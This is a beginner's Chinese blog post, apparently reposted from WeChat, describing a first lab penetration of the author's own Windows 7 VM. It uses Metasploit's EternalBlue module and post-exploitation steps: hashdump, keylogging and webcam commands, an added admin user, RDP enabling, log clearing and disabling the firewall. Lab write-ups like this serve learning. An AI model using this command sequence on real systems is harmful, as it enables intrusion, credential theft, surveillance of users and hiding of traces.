记第一次渗透的经历(利用msf渗透win7系统)

admin 2023年7月30日23:18:59评论19 views字数 2556阅读8分31秒阅读模式

前言:这是一次难忘的渗透经历,刚开始是脑子一团雾水,无从下手。然后在看了几个大佬的帖子以后便就有了头绪,接下来我便讲讲我是怎么一步一步渗透的。


(1)**准备工作**:首先我这里是对自己虚拟机中的win7系统进行渗透,因此先打开win7,同时打开kali。由于第一次渗透,我这里打开win7系统手动查看了下ip地址,这里假如是192.168.188.66;然后在kali进入有root模式,输入命令ifconfig查看kali的机ip地址,这里假如是192.168.188.36.以上便是准备工作。

(2)**渗透ing**:首先检查靶机ip是否正确,先通过命令ping 192.168.188.66查看是否ping通,在输入命令arp-scan -i命令查看是否有靶机ip地址如果有便可以进行下一步。

记第一次渗透的经历(利用msf渗透win7系统)


之后利用MSF进行渗透,输入命令msfconsole;

记第一次渗透的经历(利用msf渗透win7系统)


然后这里我用的到是千年漏洞之永恒之蓝,输入命令search ms17_010

记第一次渗透的经历(利用msf渗透win7系统)


再利用该漏洞,输入命令use exploit/windows/smb/ms17_010_eternalblue进入到攻击模块。

记第一次渗透的经历(利用msf渗透win7系统)


这里输入命令show options或者options查看需要配置的参数。

记第一次渗透的经历(利用msf渗透win7系统)


所以需要设置攻击主机的ip和靶机ip,先输入命令set rhost 192.168.188.66;回车以后再输入set  lhost 192.168.188.36。

记第一次渗透的经历(利用msf渗透win7系统)


之后使用攻击命令run或者exploit。

记第一次渗透的经历(利用msf渗透win7系统)

记第一次渗透的经历(利用msf渗透win7系统)

出现绿色加号是就说明进攻成功,进入到meterpreter中。


这个时候就要熟悉一些meterpreter的命令,这里有一些命令可以参考。

 meterpreter命令:
 keyscan_start 开始捕获击键(开始键盘记录)
 keyscan_dump 转储按键缓冲(下载键盘记录)
 keyscan_stop 停止捕获击键(停止键盘记录)
 record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
 webcam_chat 开始视频聊天(视频,对方会有弹窗)
 webcam_list 单摄像头(查看摄像头列表)
 webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
 webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
 enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
 getdesktop 得到当前的Meterpreter桌面
 reboot 重新启动远程计算机
 shutdown 关闭远程计算机
 shell 放入系统命令 shell
 enumdesktops 列出所有可访问的桌面和窗口站
 getdesktop 获取当前的meterpreter桌面
 idletime 返回远程用户空闲的秒数
 keyboard_send 发送击键
 keyevent 发送按键事件
 keyscan_dump 转储击键缓冲区
 keyscan_start 开始捕获击键
 keyscan_stop 停止捕获击键
 mouse 发送鼠标事件
 screenshare 实时观看远程用户桌面
 screenshot 抓取交互式桌面的屏幕截图
 setdesktop 更改 Meterpreters 当前桌面
 uictl 控制一些用户界面组件
 record_mic 从默认麦克风录制音频 X 秒
 webcam_chat 开始视频聊天
 webcam_list 列出网络摄像头
 webcam_snap 从指定的网络摄像头拍摄快照
 webcam_stream 播放来自指定网络摄像头的视频流
 play 在目标系统上播放波形音频文件 (.wav)
 getsystem 尝试将您的权限提升到本地系统的权限
 execute -f notepad 打开记事本

先输入命令sysinfo查看靶机硬件信息;

记第一次渗透的经历(利用msf渗透win7系统)

再输入screenshot截图靶机目前屏幕状况。

记第一次渗透的经历(利用msf渗透win7系统)

输入命令hashdump查看目标主机所有的用户名和密码(密码显示为hash值)

记第一次渗透的经历(利用msf渗透win7系统)

这里我们进入靶机cmd输入命令shell。

记第一次渗透的经历(利用msf渗透win7系统)

由于存在一些乱码我们需要命令chcp 65001。

记第一次渗透的经历(利用msf渗透win7系统)

这里需要用到一些cmd命令,以下可供参考:

 cmd指令:
 cat 读取文件内容到屏幕
 cd 更改目录
 checksum 检索文件的校验和
 cp 将源复制到目标
 del 删除指定文件
 dir 列出文件(ls 的别名)
 下载 下载文件或目录
 编辑 编辑文件
 getlwd 打印本地工作目录
 getwd 打印工作目录
 lcd 更改本地工作目录
 lls 列出本地文件
 lpwd 打印本地工作目录
 ls 列出文件
 mkdir 创建目录
 mv 将源移动到目标
 pwd 打印工作目录
 rm 删除指定文件
 rmdir 删除目录
 search 搜索文件
 show_mount 列出所有挂载点/逻辑驱动器
 upload 上传文件或目录
 pkill 按名称终止进程

————————————————

之后我们需要创建新用户以便后期提权,输入命令:

 net user zhanghao password /add : 创建新用户。

记第一次渗透的经历(利用msf渗透win7系统)


创建新用户以后,我们还需要提权,输入命令;

 net localgroup administrators zhanghao /add :将我们创建的新用户提升到管理员层次。

记第一次渗透的经历(利用msf渗透win7系统)

当然,我们提权之后还要查看我们是否提权成功,输入命令:

 net user :查看我们创建的用户,若存在,则提权成功。

之后我们在kali重新打开root,输入命令:

 rdesktop 192.168.188.66(这里的ip地址为靶机的IP地址):该指令用来远程操控靶机的桌面
 如果对方远程操控并未启用,我们则需要在meterpreter模块中手动打开,输入命令:
 run post/winidows/manage/enable_rdp
 或者:
 run getgui -e
 
 

之后我们便能渗透成功,但是我们还需销毁我们的痕迹,在meterpreter模块中输入:

 clearve :清除日志。

当然有些命令还没用到,因为我攻击的是自己的win7系统,所以我自己把防火墙关了,这里可以在cmd输入命令:

 netsh advfirewall set allprofiles state off:关闭防火墙

记第一次渗透的经历(利用msf渗透win7系统)


总结

由于是小白,很多地方都是入门,所以便记录自己的第一次渗透经历,希望自己慢慢入门。



原文始发于微信公众号(衡阳信安):记第一次渗透的经历(利用msf渗透win7系统)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月30日23:18:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记第一次渗透的经历(利用msf渗透win7系统)http://cn-sec.com/archives/1918135.html

发表评论

匿名网友 填写信息